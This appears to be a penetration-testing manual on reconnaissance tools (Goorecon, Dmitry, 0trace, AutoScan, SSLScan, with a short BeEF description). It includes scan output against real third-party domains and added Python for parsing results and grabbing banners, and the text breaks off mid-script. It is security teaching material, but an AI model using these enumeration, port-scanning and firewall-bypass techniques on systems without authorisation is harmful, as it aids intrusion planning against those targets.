Backtrack Manual Part5

Project Report on

Project by - Nutan Kumar Panda
Technology Evangelist, ISEH
R&D - ATL Guwahati


Enjoy. For any query contact: [email protected]


BeEF is the Browser Exploitation Framework, a professional tool for demonstrating the real-time impact of browser vulnerabilities. Development has focused on a modular structure that makes writing a new module trivial, with the intelligence residing within BeEF itself. Current modules include the first public inter-protocol exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more. The modules are intended to be a representative set of current browser attacks, with the notable exception of launching cross-site scripting viruses. You can download BeEF from Bindshell.net.

Goorecon

In the Information Gathering stage of a pentest we are interested in finding the various sub-domains of our target domain. As we have seen in previous videos, querying DNS servers with zone transfer requests, or retrieving entries with a dictionary / brute-force attack, is a good start but fails in most cases: zone transfers are usually refused, and brute-forcing only finds names that happen to be in the wordlist. An alternative technique is to query Google and check whether it found any sub-domains while crawling the target. Goorecon is just the tool we need for this.

The syntax of Goorecon is very simple. Let's have a look at the options:

root@666:/pentest/enumeration/goorecon# ./goorecon.rb

Goorecon .01
By Carlos Perez
Email: [email protected]

This is a simple tool written for subdomain enumeration and email gathering
during authorized penetration test engagements using Google.

USAGE: ruby goorecon.rb <type> <target>

TYPES:
-s Subdomain Enumeration
-e Email gathering

As you can see there are really only two options: one looks for sub-domains and the other looks for email addresses.

Here is an example of using the tool to gather sub-domains:

root@666:/pentest/enumeration/goorecon# ./goorecon.rb -s cnn.com

www.cnn.com,157.166.255.19
www.cnn.com,157.166.255.18
www.cnn.com,157.166.226.26
www.cnn.com,157.166.226.25
www.cnn.com,157.166.224.26
www.cnn.com,157.166.224.25
edition.cnn.com,157.166.226.45
edition.cnn.com,157.166.226.46
edition.cnn.com,157.166.255.31
edition.cnn.com,157.166.255.32
marquee.blogs.cnn.com,74.200.247.187
marquee.blogs.cnn.com,76.74.255.117
marquee.blogs.cnn.com,76.74.255.123
marquee.blogs.cnn.com,72.233.104.123
marquee.blogs.cnn.com,72.233.127.217
marquee.blogs.cnn.com,74.200.247.59
archives.cnn.com,157.166.224.110
archives.cnn.com,157.166.226.110
newsroom.blogs.cnn.com,72.233.104.123
newsroom.blogs.cnn.com,72.233.127.217
newsroom.blogs.cnn.com,74.200.247.59
newsroom.blogs.cnn.com,74.200.247.187
newsroom.blogs.cnn.com,76.74.255.117
newsroom.blogs.cnn.com,76.74.255.123
money.cnn.com,157.166.226.108
money.cnn.com,157.166.226.109
money.cnn.com,157.166.255.24
money.cnn.com,157.166.255.25
money.cnn.com,157.166.224.108
money.cnn.com,157.166.224.109
us.cnn.com,157.166.255.19
us.cnn.com,157.166.224.25
us.cnn.com,157.166.224.26
us.cnn.com,157.166.226.25
us.cnn.com,157.166.226.26
us.cnn.com,157.166.255.18
politicalticker.blogs.cnn.com,76.74.255.123
politicalticker.blogs.cnn.com,72.233.104.123
politicalticker.blogs.cnn.com,72.233.127.217
politicalticker.blogs.cnn.com,74.200.247.59
politicalticker.blogs.cnn.com,74.200.247.187
politicalticker.blogs.cnn.com,76.74.255.117
www.studentnews.cnn.com,157.166.226.112
www.studentnews.cnn.com,157.166.224.112
tech.fortune.cnn.com,72.233.69.6
tech.fortune.cnn.com,74.200.243.251
tech.fortune.cnn.com,74.200.244.59
tech.fortune.cnn.com,76.74.254.120
tech.fortune.cnn.com,76.74.254.123
tech.fortune.cnn.com,72.233.2.58
transcripts.cnn.com,157.166.226.110
transcripts.cnn.com,157.166.224.110
joybehar.blogs.cnn.com,72.233.104.123
joybehar.blogs.cnn.com,72.233.127.217
joybehar.blogs.cnn.com,74.200.247.59
joybehar.blogs.cnn.com,74.200.247.187
joybehar.blogs.cnn.com,76.74.255.117
joybehar.blogs.cnn.com,76.74.255.123
pagingdrgupta.blogs.cnn.com,72.233.127.217
pagingdrgupta.blogs.cnn.com,74.200.247.59
pagingdrgupta.blogs.cnn.com,74.200.247.187
pagingdrgupta.blogs.cnn.com,76.74.255.117
pagingdrgupta.blogs.cnn.com,76.74.255.123
pagingdrgupta.blogs.cnn.com,72.233.104.123
ricksanchez.blogs.cnn.com,72.233.104.123
ricksanchez.blogs.cnn.com,72.233.127.217
ricksanchez.blogs.cnn.com,74.200.247.59
ricksanchez.blogs.cnn.com,74.200.247.187
ricksanchez.blogs.cnn.com,76.74.255.117
ricksanchez.blogs.cnn.com,76.74.255.123
sportsillustrated.cnn.com,157.166.224.105
sportsillustrated.cnn.com,157.166.226.104
sportsillustrated.cnn.com,157.166.226.105
sportsillustrated.cnn.com,157.166.255.22
sportsillustrated.cnn.com,157.166.255.23
sportsillustrated.cnn.com,157.166.224.104
insession.blogs.cnn.com,76.74.255.117
insession.blogs.cnn.com,76.74.255.123
insession.blogs.cnn.com,72.233.104.123
insession.blogs.cnn.com,72.233.127.217
insession.blogs.cnn.com,74.200.247.59
insession.blogs.cnn.com,74.200.247.187
behindthescenes.blogs.cnn.com,76.74.255.123
behindthescenes.blogs.cnn.com,72.233.104.123
behindthescenes.blogs.cnn.com,72.233.127.217
behindthescenes.blogs.cnn.com,74.200.247.59
behindthescenes.blogs.cnn.com,74.200.247.187
behindthescenes.blogs.cnn.com,76.74.255.117
newspulse.cnn.com,157.166.226.32
newspulse.cnn.com,157.166.224.31
newspulse.cnn.com,157.166.224.32
newspulse.cnn.com,157.166.226.31
tips.blogs.cnn.com,76.74.255.117
tips.blogs.cnn.com,76.74.255.123
tips.blogs.cnn.com,72.233.104.123
tips.blogs.cnn.com,72.233.127.217
tips.blogs.cnn.com,74.200.247.59
tips.blogs.cnn.com,74.200.247.187
afghanistan.blogs.cnn.com,74.200.247.187
afghanistan.blogs.cnn.com,76.74.255.117
afghanistan.blogs.cnn.com,76.74.255.123
afghanistan.blogs.cnn.com,72.233.104.123
afghanistan.blogs.cnn.com,72.233.127.217
afghanistan.blogs.cnn.com,74.200.247.59
weather.cnn.com,157.166.224.118
weather.cnn.com,157.166.226.117
weather.cnn.com,157.166.224.117
news.blogs.cnn.com,72.233.69.6
news.blogs.cnn.com,74.200.243.251
news.blogs.cnn.com,74.200.244.59
news.blogs.cnn.com,76.74.254.120
news.blogs.cnn.com,76.74.254.123
news.blogs.cnn.com,72.233.2.58
weather.edition.cnn.com,157.166.224.118
weather.edition.cnn.com,157.166.226.117
weather.edition.cnn.com,157.166.224.117
inthefield.blogs.cnn.com,76.74.255.123
inthefield.blogs.cnn.com,72.233.104.123
inthefield.blogs.cnn.com,72.233.127.217
inthefield.blogs.cnn.com,74.200.247.59

And here is an example of using Goorecon to grab email addresses. The target domain on the command line and every address in the output are redacted in this copy of the document; the tool prints one address per line, in the same way as the host,IP pairs above:

root@666:/pentest/enumeration/goorecon# ./goorecon.rb -e [email protected]
[email protected]
[email protected]
[email protected]
(remaining addresses likewise redacted)
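Post-processing that output is where the value lies. The following Python script is an added example, not part of the manual or of goorecon: it parses the `host,ip` lines the tool prints, skips anything malformed, and groups sub-domains whose resolved address sets are identical, which is a quick way to see which names sit behind the same load balancer or hosting platform (all the blogs.cnn.com hosts above share one set of six addresses, the main site another). The sample input is constructed from a subset of the cnn.com output above, one host from the appinonline.com run later in this manual, and two deliberately broken lines.

```python
"""Group goorecon-style "host,ip" output into infrastructure clusters.

Added example, not part of the manual or of goorecon. It post-processes the
CSV lines the tool prints so that, instead of a hundred raw pairs, you see
which sub-domains share the same set of addresses.
"""
import ipaddress
from collections import defaultdict

# Constructed sample: a subset of the cnn.com output above, one host from the
# appinonline.com run later in this manual, and two deliberately broken lines.
SAMPLE = """\
www.cnn.com,157.166.255.19
www.cnn.com,157.166.255.18
us.cnn.com,157.166.255.19
us.cnn.com,157.166.255.18
marquee.blogs.cnn.com,74.200.247.187
marquee.blogs.cnn.com,76.74.255.117
newsroom.blogs.cnn.com,74.200.247.187
newsroom.blogs.cnn.com,76.74.255.117
blog.appinonline.com,96.30.4.75
garbage line without a comma
www.cnn.com,not.an.ip
"""


def parse_goorecon(text):
    """Return {hostname: frozenset of ip_address} from "host,ip" lines.

    Lines that are not "host,ip", or whose address does not parse, are
    skipped rather than aborting the run: scraped output is often dirty.
    """
    hosts = defaultdict(set)
    for line in text.splitlines():
        name, sep, addr = line.strip().partition(",")
        if not sep:
            continue
        try:
            ip = ipaddress.ip_address(addr.strip())
        except ValueError:
            continue
        hosts[name.strip().lower()].add(ip)
    return {h: frozenset(ips) for h, ips in hosts.items()}


def cluster_by_address_set(hosts):
    """Group hostnames whose resolved address sets are identical.

    Returns [(sorted ip strings, sorted hostnames)], largest cluster first.
    Hosts in one cluster almost always sit behind the same load balancer or
    hosting platform, which matters when scoping the rest of the test.
    """
    clusters = defaultdict(list)
    for name, ips in hosts.items():
        clusters[ips].append(name)
    return sorted(
        ((sorted(map(str, ips)), sorted(names)) for ips, names in clusters.items()),
        key=lambda c: (-len(c[1]), c[0]),
    )


def networks_seen(hosts, prefix=24):
    """Distinct /prefix networks behind all the addresses, for scoping a scan."""
    nets = {ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
            for ips in hosts.values() for ip in ips}
    return sorted(str(n) for n in nets)


if __name__ == "__main__":
    parsed = parse_goorecon(SAMPLE)
    for ips, names in cluster_by_address_set(parsed):
        print(", ".join(names))
        print("    -> " + ", ".join(ips))
    print("networks:", ", ".join(networks_seen(parsed)))
```

Feed it the real output with `./goorecon.rb -s cnn.com > hosts.csv` and read the file into `parse_goorecon`; the `/24` summary is what you hand to the port-scanning stage.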

Dmitry

Dmitry or Deepmagic Information Gathering Tool is an all in one host information tool included in Backtrack 4’s Information Gathering section. Personally I prefer doing most info gathering using tools built into Linux however it is nice to run a tool like this in the background and come back later if you are multi-tasking.

Dmitry – Deepmagic Information Gathering Tool Details:

So Dmitry can perform numerous tasks depending on the switches provided, including whois lookups on both the domain and the IP, netcraft.com data (OS, uptime and web server information), a subdomain search, an email address search, and various TCP port scan options. Letting it run against a target host returns all of this in one sweep. Below is an example using Dmitry against the appinonline.com domain/host. The switches used are -w (domain whois), -i (IP whois), -n (Netcraft), -s (subdomains), -e (email addresses), -p (TCP port scan), -f (also report filtered ports) and -b (read the banner from each open port), with -o writing the report to a file.

Dmitry Example Against appinonline.com Domain/Host:

root@bt:/usr/local/bin# dmitry -winsepffb -o hosts.txt www.appinonline.com
Deepmagic Information Gathering Tool
"There be some deep magic going on"

Writing output to 'hosts.txt'

HostIP:75.126.45.217
HostName:www.appinonline.com

Gathered Inet-whois information for 75.126.45.217
---------------------------------

OrgName:    SoftLayer Technologies Inc.
OrgID:      SOFTL
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

ReferralServer: rwhois://rwhois.softlayer.com:4321

NetRange:   75.126.0.0 - 75.126.255.255
CIDR:       75.126.0.0/16
OriginAS:   AS36351
NetName:    SOFTLAYER-4-3
NetHandle:  NET-75-126-0-0-1
Parent:     NET-75-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.ARPA.GLOBAL-DATACENTER.COM
NameServer: NS2.ARPA.GLOBAL-DATACENTER.COM
Comment:    [email protected]
RegDate:    2006-05-12
Updated:    2009-08-26

RAbuseHandle: ABUSE1025-ARIN
RAbuseName:   Abuse
RAbusePhone:  +1-214-442-0605
RAbuseEmail:  [email protected]

RNOCHandle: IPADM258-ARIN
RNOCName:   IP Admin
RNOCPhone:  +1-214-442-0600
RNOCEmail:  [email protected]

RTechHandle: IPADM258-ARIN
RTechName:   IP Admin
RTechPhone:  +1-214-442-0600
RTechEmail:  [email protected]

OrgAbuseHandle: ABUSE1025-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-214-442-0605
OrgAbuseEmail:  [email protected]

OrgTechHandle: IPADM258-ARIN
OrgTechName:   IP Admin
OrgTechPhone:  +1-214-442-0600
OrgTechEmail:  [email protected]

# ARIN WHOIS database, last updated 2010-06-10 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.html
#
# Attention! Changes are coming to ARIN's Whois service on June 26.
# See https://www.arin.net/features/whois for details on the improvements.

Gathered Inic-whois information for appinonline.com
---------------------------------
   Domain Name: APPINONLINE.COM
   Registrar: NET 4 INDIA LIMITED
   Whois Server: whois.net4domains.com
   Referral URL: http://www.net4.in
   Name Server: NS3.IP01-DNS.NET
   Name Server: NS4.IP01-DNS.NET
   Status: ok
   Updated Date: 18-feb-2010
   Creation Date: 30-may-2004
   Expiration Date: 30-may-2018

>>> Last update of whois database: Fri, 11 Jun 2010 08:31:21 UTC <<<

The Registry database contains ONLY .COM, .NET, .EDU domains and

Gathered Netcraft information for www.appinonline.com
---------------------------------

Retrieving Netcraft.com information for www.appinonline.com
No uptime reports available for host: www.appinonline.com
Netcraft.com Information gathered

Gathered Subdomain information for appinonline.com
---------------------------------
Searching Google.com:80...
HostName:www.appinonline.com
HostIP:75.126.45.217
HostName:delhi34.appinonline.com
HostIP:75.126.45.217
HostName:blog.appinonline.com
HostIP:96.30.4.75
HostName:punjabagh27.appinonline.com
HostIP:75.126.45.217
Searching Altavista.com:80...
Found 4 possible subdomain(s) for host appinonline.com, Searched 0 pages containing 0 results

Gathered E-Mail information for appinonline.com
---------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host appinonline.com, Searched 0 pages containing 0 results

Gathered TCP Port information for 75.126.45.217
---------------------------------

 Port     State

21/tcp    open
>> 220 FTP Server ready.

25/tcp    open
>> 220 ip01-web5.net ESMTP

53/tcp    open
80/tcp    open
110/tcp   open
>> +OK <18937.1276245286@pop3>

143/tcp   open
>> * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STA@î

Portscan Finished: Scanned 150 ports, 128 ports were in state closed
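The port section above is a TCP connect scan with banner grabbing (the -p and -b switches). As an added example, not part of dmitry, here is the same operation in Python, kept offline by starting throw-away listeners on 127.0.0.1 that answer with the FTP and SMTP greetings seen above (constructed). It also covers two cases a scanner has to handle: a service that waits for the client to speak first, which is why port 80 shows no banner above, and a banner containing binary junk, like the truncated IMAP line.

```python
"""TCP connect scan with banner grabbing, as dmitry's -p -b switches do.

Added example, not dmitry's code. To stay runnable offline it starts
throw-away listeners on 127.0.0.1 that play the services seen in the
output above (constructed banners), so the scanner has something to talk to.
"""
import socket
import threading


def fake_service(banner):
    """Listen on an ephemeral 127.0.0.1 port. A banner of bytes is sent as
    soon as a client connects; None means "wait for the client to speak",
    which is how HTTP behaves. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                if banner is None:
                    conn.recv(1)          # block until the client gives up
                else:
                    conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port():
    """Reserve an ephemeral port and release it, so connecting is refused."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def grab_banner(host, port, timeout=1.0, max_bytes=256):
    """Return (state, banner) for host:port.

    state is "open", "closed" (connection refused) or "filtered" (no answer
    within the timeout). banner is the first line the service volunteers.
    The IMAP line in the dmitry output above ends in binary junk; a scanner
    must not crash on that, so undecodable bytes are replaced, not raised.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                data = s.recv(max_bytes)
            except socket.timeout:
                return "open", ""       # open, but the client must talk first
            line = data.split(b"\n", 1)[0].rstrip(b"\r")
            return "open", line.decode("utf-8", errors="replace")
    except ConnectionRefusedError:
        return "closed", ""
    except OSError:                     # includes a connect timeout
        return "filtered", ""


def scan(host, ports):
    """Scan the given ports in order; returns [(port, state, banner), ...]."""
    return [(p,) + grab_banner(host, p) for p in ports]


if __name__ == "__main__":
    targets = [fake_service(b"220 FTP Server ready.\r\n"),
               fake_service(b"220 ip01-web5.net ESMTP\r\n"),
               fake_service(None),
               closed_port()]
    for port, state, banner in scan("127.0.0.1", targets):
        print(f"{port}/tcp\t{state}" + (f"\n>> {banner}" if banner else ""))
```

Against a real host, pass its address and a port list to `scan`; the one-second timeout is what separates "open but silent" from "filtered", so raise it on slow links.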

0trace

0trace is a security reconnaissance / firewall-bypassing tool. It performs hop enumeration ("traceroute") within an established TCP connection, such as an HTTP or SMTP session, instead of sending stray packets as traceroute-type tools usually do. The important benefit of using an established connection, and of matching the TCP packets that carry the TTL-based probe to it, is that such traffic is happily allowed through by many stateful firewalls and other defences without further inspection, because it is related to an entry in the connection table.

A good example of the difference is www.ebay.com (66.135.192.124) - a regular UDP/ICMP traceroute and tcptraceroute both end like this:

14 as-0-0.bbr1.SanJose1.Level3.net (64.159.1.133) ...
15 ae-12-53.car2.SanJose1.Level3.net (4.68.123.80) ...
16 * * *
17 * * *
18 * * *

Let's do the same using 0trace: we first manually telnet to 66.135.192.124 on port 80 in one terminal, then in another run './0trace.sh eth0 66.135.192.124', and finally, back in the telnet session, enter 'GET / HTTP/1.0' (followed by a single newline, not two) to solicit some client-server traffic while keeping the session alive for the couple of seconds 0trace needs to complete the probe.

The output is as follows:

10 80.91.249.14
11 213.248.65.210
12 213.248.83.66
13 4.68.110.81
14 4.68.97.33
15 64.159.1.130
16 4.68.123.48
17 166.90.140.134 <---
18 10.6.1.166     <--- new data
19 10.6.1.70      <--- Target reached.

The last three lines reveal firewalled infrastructure, including private addresses used on the inside of the company. This is obviously an important piece of information as far as penetration testing is concerned.
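As an added example (not 0trace's code), the following Python parses the two listings above, the plain traceroute and the 0trace run, and reports which hops the in-session technique exposed and which of them are RFC 1918 addresses; that is the part of a trace a tester actually writes up. Both listings are embedded as constructed text.

```python
"""Diff a plain traceroute against a 0trace run.

Added example, not 0trace's code. Both listings are the eBay traces quoted
above, embedded here as constructed text. The parsers accept traceroute's
"N host (ip) ..." and "N * * *" lines and 0trace's "N ip [<--- note]" lines.
"""
import ipaddress
import re

TRACEROUTE = """\
14 as-0-0.bbr1.SanJose1.Level3.net (64.159.1.133) ...
15 ae-12-53.car2.SanJose1.Level3.net (4.68.123.80) ...
16 * * *
17 * * *
18 * * *
"""

ZEROTRACE = """\
14 4.68.97.33
15 64.159.1.130
16 4.68.123.48
17 166.90.140.134 <---
18 10.6.1.166 <--- new data
19 10.6.1.70 <--- Target reached.
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_hops(text):
    """Return {ttl: ip_string_or_None}; a '* * *' hop maps to None."""
    hops = {}
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        ip = IP_RE.search(m.group(2))
        hops[int(m.group(1))] = ip.group(1) if ip else None
    return hops


def revealed_hops(traceroute_text, zerotrace_text):
    """Hops that answered in the 0trace run but that the plain traceroute
    lost (timed out, or never got that far), tagged private or public.
    Private (RFC 1918) hops past the perimeter are what the text above
    calls the interesting part: internal addressing behind the firewall."""
    plain = parse_hops(traceroute_text)
    probed = parse_hops(zerotrace_text)
    revealed = []
    for ttl in sorted(probed):
        ip = probed[ttl]
        if ip is None or plain.get(ttl) is not None:
            continue
        scope = "private" if ipaddress.ip_address(ip).is_private else "public"
        revealed.append((ttl, ip, scope))
    return revealed


if __name__ == "__main__":
    for ttl, ip, scope in revealed_hops(TRACEROUTE, ZEROTRACE):
        print(f"{ttl:>3} {ip:<16} {scope}")
```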

Of course, 0trace won't work everywhere and all the time. The tool will not produce interesting results in the following situations:

- Target's firewall drops all outgoing ICMP messages,

- Target's firewall does TTL or full-packet rewriting,

- There's an application layer proxy / load balancer in the way (Akamai, in-house LBs, etc),

- There's no notable layer 3 infrastructure behind the firewall.

The tool also has a fairly distinctive TCP signature, and as such, it can be detected by IDS/IPS systems.

Usage: /usr/local/sbin/0trace.sh iface target_ip [ target_port ]

root@bt:~# ./0trace.py eth0 66.135.192.87 80
bash: ./0trace.py: No such file or directory
root@bt:~# /0trace.py eth0 hacking.appintraining.com 80
bash: /0trace.py: No such file or directory
root@bt:~# /usr/local/sbin/0trace.sh eth0 hacking.appintraining.com 80
0trace v0.01 PoC by <[email protected]>
[+] Waiting for traffic from target on eth0...
[+] Traffic acquired, waiting for a gap...
[+] Target acquired: 192.168.0.208:53870 -> 66.98.135.161:80 (2989104564/3240623664).
[+] Setting up a sniffer...
[+] Sending probes...

TRACE RESULTS
-------------
1 192.168.0.1
2 172.16.4.1
Probe rejected by target.

Autoscan Networks

AutoScan-Network is a network scanner (a discovery and management application). No configuration is required to scan your network; the main goal is to print the list of equipment connected to it. Entire subnets can be scanned simultaneously without human intervention, and a preset list of ports is scanned on each piece of equipment. Its features:

1. Fast multithreaded scanning
2. Automatic network discovery
3. Extremely low bandwidth
4. Entire subnets can be scanned simultaneously without human intervention
5. Real-time addition of new machines put on the network
6. Monitoring of equipment (router, server, firewall, ...)
7. Monitoring of network services (smtp, http, pop, ...)
8. Detection of the OS, brand and model where known (with the possibility of adding unknown equipment to the database)

Sslscan

SSLScan is a fast SSL service scanner. It determines which ciphers are supported, the preferred ciphers, and the service certificate. It is also possible to supply a client certificate and private key to use with the connection.

Build:
sslscan can be built manually using the following command:

gcc -lssl -o sslscan sslscan.c

(Current toolchains resolve libraries in order, so the libraries must come after the source file: gcc -o sslscan sslscan.c -lssl -lcrypto.)

The command line arguments for SSLScan are:

sslscan [Options] [host:port | host]

Options:

--targets=<file>     A file containing a list of hosts to check. Hosts can be supplied with ports (i.e. host:port).
--no-failed          List only accepted ciphers (default is to list all ciphers).
--ssl2               Only check SSLv2 ciphers.
--ssl3               Only check SSLv3 ciphers.
--tls1               Only check TLSv1 ciphers.
--pk=<file>          A file containing the private key or a PKCS#12 file containing a private key/certificate pair (as produced by MSIE and Netscape).
--pkpass=<password>  The password for the private key or PKCS#12 file.
--certs=<file>       A file containing PEM/ASN1 formatted client certificates.
--xml=<file>         Output results to an XML file.
--version            Display the program version.
--help               Display the help text you are now reading.

Example

root@bt:~# sslscan -xml=/etc/lloo.txt appinonline.com
                   _
         ___ ___| |___  ___ __ _ _ __
        / __/ __| / __|/ __/ _` | '_ \
        \__ \__ \ \__ \ (_| (_| | | | |
        |___/___/_|___/\___\__,_|_| |_|

                  Version 1.6
             http://www.titania.co.uk
        Copyright (C) 2007-2008 Ian Ventura-Whiting

Testing SSL server appinonline.com on port 443

  Supported Server Cipher(s):
    Accepted  SSLv2  168 bits  DES-CBC3-MD5
    Accepted  SSLv2  56 bits   DES-CBC-MD5
    Accepted  SSLv2  40 bits   EXP-RC2-CBC-MD5
    Accepted  SSLv2  128 bits  RC2-CBC-MD5
    Accepted  SSLv2  40 bits   EXP-RC4-MD5
    Accepted  SSLv2  128 bits  RC4-MD5
    Rejected  SSLv3  256 bits  ADH-AES256-SHA
    Accepted  SSLv3  256 bits  DHE-RSA-AES256-SHA
    Rejected  SSLv3  256 bits  DHE-DSS-AES256-SHA
    Accepted  SSLv3  256 bits  AES256-SHA
    Rejected  SSLv3  128 bits  ADH-AES128-SHA
    Accepted  SSLv3  128 bits  DHE-RSA-AES128-SHA
    Rejected  SSLv3  128 bits  DHE-DSS-AES128-SHA
    Accepted  SSLv3  128 bits  AES128-SHA
    Rejected  SSLv3  168 bits  ADH-DES-CBC3-SHA
    Rejected  SSLv3  56 bits   ADH-DES-CBC-SHA
    Rejected  SSLv3  40 bits   EXP-ADH-DES-CBC-SHA
    Rejected  SSLv3  128 bits  ADH-RC4-MD5
    Rejected  SSLv3  40 bits   EXP-ADH-RC4-MD5
    Accepted  SSLv3  168 bits  EDH-RSA-DES-CBC3-SHA
    Accepted  SSLv3  56 bits   EDH-RSA-DES-CBC-SHA
    Accepted  SSLv3  40 bits   EXP-EDH-RSA-DES-CBC-SHA
    Rejected  SSLv3  168 bits  EDH-DSS-DES-CBC3-SHA
    Rejected  SSLv3  56 bits   EDH-DSS-DES-CBC-SHA
    Rejected  SSLv3  40 bits   EXP-EDH-DSS-DES-CBC-SHA
    Accepted  SSLv3  168 bits  DES-CBC3-SHA
    Accepted  SSLv3  56 bits   DES-CBC-SHA
    Accepted  SSLv3  40 bits   EXP-DES-CBC-SHA
    Accepted  SSLv3  40 bits   EXP-RC2-CBC-MD5
    Accepted  SSLv3  128 bits  RC4-SHA
    Accepted  SSLv3  128 bits  RC4-MD5
    Accepted  SSLv3  40 bits   EXP-RC4-MD5
    Rejected  SSLv3  0 bits    NULL-SHA
    Rejected  SSLv3  0 bits    NULL-MD5
    Rejected  TLSv1  256 bits  ADH-AES256-SHA
    Accepted  TLSv1  256 bits  DHE-RSA-AES256-SHA
    Rejected  TLSv1  256 bits  DHE-DSS-AES256-SHA
    Accepted  TLSv1  256 bits  AES256-SHA
    Rejected  TLSv1  128 bits  ADH-AES128-SHA
    Accepted  TLSv1  128 bits  DHE-RSA-AES128-SHA
    Rejected  TLSv1  128 bits  DHE-DSS-AES128-SHA
    Accepted  TLSv1  128 bits  AES128-SHA
    Rejected  TLSv1  168 bits  ADH-DES-CBC3-SHA
    Rejected  TLSv1  56 bits   ADH-DES-CBC-SHA
    Rejected  TLSv1  40 bits   EXP-ADH-DES-CBC-SHA
    Rejected  TLSv1  128 bits  ADH-RC4-MD5
    Rejected  TLSv1  40 bits   EXP-ADH-RC4-MD5
    Accepted  TLSv1  168 bits  EDH-RSA-DES-CBC3-SHA
    Accepted  TLSv1  56 bits   EDH-RSA-DES-CBC-SHA
    Accepted  TLSv1  40 bits   EXP-EDH-RSA-DES-CBC-SHA
    Rejected  TLSv1  168 bits  EDH-DSS-DES-CBC3-SHA
    Rejected  TLSv1  56 bits   EDH-DSS-DES-CBC-SHA
    Rejected  TLSv1  40 bits   EXP-EDH-DSS-DES-CBC-SHA
    Accepted  TLSv1  168 bits  DES-CBC3-SHA
    Accepted  TLSv1  56 bits   DES-CBC-SHA
    Accepted  TLSv1  40 bits   EXP-DES-CBC-SHA
    Accepted  TLSv1  40 bits   EXP-RC2-CBC-MD5
    Accepted  TLSv1  128 bits  RC4-SHA
    Accepted  TLSv1  128 bits  RC4-MD5
    Accepted  TLSv1  40 bits   EXP-RC4-MD5
    Rejected  TLSv1  0 bits    NULL-SHA
    Rejected  TLSv1  0 bits    NULL-MD5

  Prefered Server Cipher(s):
    SSLv2  168 bits  DES-CBC3-MD5
    SSLv3  256 bits  DHE-RSA-AES256-SHA
    TLSv1  256 bits  DHE-RSA-AES256-SHA

  SSL Certificate:
    Version: 2
    Serial Number: 966173
    Signature Algorithm: sha1WithRSAEncryption
    Issuer: /C=US/O=Equifax/OU=Equifax Secure Certificate Authority
    Not valid before: Jan 10 18:50:39 2010 GMT
    Not valid after: Feb 11 14:22:03 2011 GMT
    Subject: /serialNumber=mVSeVz4nkJ-qQhthu31BiNHsyKIrLvpX/C=US/O=secure.ip01-web3.net/OU=GT49606253/OU=See www.rapidssl.com/resources/cps (c)10/OU=Domain Control Validated - RapidSSL(R)/CN=secure.ip01-web3.net
    Public Key Algorithm: rsaEncryption
    RSA Public Key: (1024 bit)
      Modulus (1024 bit):
          00:ba:1d:b7:04:73:23:d3:e7:de:29:46:90:6b:99:
          79:4f:c2:53:23:63:73:8d:e9:d7:2f:58:a5:96:d9:
          4c:80:ca:31:48:c9:d1:4c:b9:4c:7c:08:7c:74:85:
          de:53:1a:a3:99:38:89:35:74:20:17:eb:4b:6d:e6:
          b9:ff:3a:8c:e2:40:e5:b7:3c:9d:84:3d:0f:87:5b:
          f7:a8:b4:22:2b:88:bc:f9:52:35:ba:7b:75:49:b1:
          d7:2a:f8:65:a3:ce:87:4b:fe:0a:30:53:2c:32:ed:
          8c:37:f4:c9:c7:3c:a7:3c:c1:00:65:c4:49:eb:bd:
          02:75:90:b2:c3:71:8f:f2:6d
      Exponent: 65537 (0x10001)
    X509v3 Extensions:
      X509v3 Key Usage: critical
        Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment
      X509v3 Subject Key Identifier:
        FF:6C:2E:6C:1F:22:B7:15:9C:1A:8F:8B:7A:69:FF:3C:A8:70:10:C0
      X509v3 CRL Distribution Points:
        URI:http://crl.geotrust.com/crls/secureca.crl
      X509v3 Authority Key Identifier:
        keyid:48:E6:68:F9:2B:D2:B2:95:D7:47:D8:23:20:10:4F:33:98:90:9F:D4
      X509v3 Extended Key Usage:
        TLS Web Server Authentication, TLS Web Client Authentication
  Verify Certificate:
    unable to get local issuer certificate

A note on the command line: the option is spelled --xml=<file> (two dashes) in the help text above; as typed here, with a single dash, it does not match that option, so check whether the XML file was actually written.
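Reading a listing like the one above by eye is error-prone, so here is an added Python example (not sslscan's code) that parses the Accepted/Rejected lines and flags what a tester would report: SSLv2 enabled, 40-bit export suites, single DES, RC4 and MD5-MAC suites, and anonymous or NULL suites if any had been accepted. The sample input is a constructed subset of the appinonline.com output; the weakness rules are this example's own policy. Two further points in the output itself that the script does not cover: the certificate's CN is secure.ip01-web3.net rather than appinonline.com (a shared hosting certificate, so a browser visiting appinonline.com over HTTPS warns about the name), and the RSA key is only 1024 bits.

```python
"""Grade an sslscan 1.x cipher listing like the one above.

Added example, not sslscan's code. It parses the "Accepted/Rejected <proto>
<bits> bits <suite>" lines and reports what a tester would write up. The
weakness rules are this example's own policy, not something sslscan prints.
"""
import re

LINE_RE = re.compile(
    r"^\s*(Accepted|Rejected)\s+(SSLv2|SSLv3|TLSv1(?:\.\d)?)\s+(\d+)\s+bits\s+(\S+)")

# Constructed sample: a subset of the appinonline.com output above.
SAMPLE = """\
Supported Server Cipher(s):
  Accepted  SSLv2  168 bits  DES-CBC3-MD5
  Accepted  SSLv2  40 bits   EXP-RC2-CBC-MD5
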